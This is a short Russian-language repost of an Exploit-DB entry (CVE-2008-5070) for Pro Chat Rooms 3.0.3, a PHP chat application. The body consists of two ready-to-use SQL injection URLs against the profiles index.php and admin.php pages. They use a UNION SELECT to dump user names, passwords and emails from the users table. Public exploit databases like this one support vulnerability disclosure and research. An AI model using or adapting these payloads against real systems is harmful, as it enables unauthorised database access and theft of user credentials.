- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6612
- Проверка EDB
-
- Пройдено
- Автор
- ~!DOK_TOR!~
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-5070
- Дата публикации
- 2008-09-28
Код:
Author: ~!Dok_tOR!~
Date found: 28.09.08
Product: Pro Chat Rooms
Version: 3.0.3
Price: $55
URL: www.prochatrooms.com
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off
Exploit 1:
http://localhost/[installdir]/profiles/index.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*
Exploit 2:
http://localhost/[installdir]/profiles/admin.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*
# milw0rm.com [2008-09-28]- Источник
- www.exploit-db.com
